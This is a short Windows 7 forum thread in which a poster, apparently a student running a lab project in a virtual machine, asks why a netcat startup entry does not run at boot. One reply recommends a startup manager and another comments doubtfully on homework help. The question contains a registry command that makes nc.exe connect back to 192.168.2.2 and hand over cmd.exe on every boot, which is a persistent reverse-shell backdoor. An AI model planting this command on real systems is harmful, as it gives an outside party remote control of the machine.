Hello everyone,

I'm using windows 7 32bit in my VMware machine and i'm trying to make a program load on startup.
This program is netcat , i'm running a project on my university and i gotta make it load on boot.

On cmd i'm executing the following command to add netcat on startup registry:

reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v "netcat" /t REG_SZ /d "%windir%\system32\nc.exe 192.168.2.2 10001 -d -e cmd.exe"

where "%windir\system32\nc.exe" is the path i put "nc.exe" into , and "192.168.2.2 10001" is the local IP and port that it is gonna connect to on boot.

Anyone has any idea why when my VMware machine reboots nc.exe never runs on startup?
Any help would be much appreciated.
Thanks in Advance.

Hi and welcome to Seven Forums!!!

You can try CodeStuff Starter.
With this free program you can add, edit and delete programs that run at boot.

Hope this helps

From my short time on this Forum I don't believe you will find much help doing your homework for you: But who knows what might happen.
